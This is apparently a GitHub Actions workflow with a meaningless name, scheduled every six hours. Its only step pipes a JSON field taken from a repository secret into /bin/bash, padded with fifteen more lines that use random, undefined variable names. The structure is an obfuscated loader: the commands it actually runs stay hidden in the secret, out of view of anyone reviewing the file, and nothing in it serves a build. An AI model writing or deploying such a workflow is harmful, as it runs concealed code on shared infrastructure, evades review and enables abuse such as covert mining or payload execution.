name: equationmilitary

on:
  workflow_dispatch:
  schedule:
    - cron: '16 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: equationmilitary
        env:
          a9: ${{ secrets.a9 }}
        run: |
          echo $a9 | jq -r .b3881 | /bin/bash
          echo $lwtrf23881 | jq -r .c254 | /bin/bash
          echo $kjzpq4943 | jq -r .hlmj0 | /bin/bash
          echo $hsyq407 | jq -r .bms30 | /bin/bash
          echo $xjaab74354 | jq -r .l638 | /bin/bash
          echo $h01360 | jq -r .r12 | /bin/bash
          echo $viap59894 | jq -r .bv5 | /bin/bash
          echo $pe0 | jq -r .g9 | /bin/bash
          echo $pdm46 | jq -r .ndst6 | /bin/bash
          echo $sexm2 | jq -r .uzwjf63 | /bin/bash
          echo $sxqb8 | jq -r .ve8 | /bin/bash
          echo $pk10 | jq -r .t0 | /bin/bash
          echo $rca3 | jq -r .yv63 | /bin/bash
          echo $vcwb09247 | jq -r .z05 | /bin/bash
          echo $l8597 | jq -r .txnt1348 | /bin/bash
          echo $ftl785 | jq -r .gcea61588 | /bin/bash

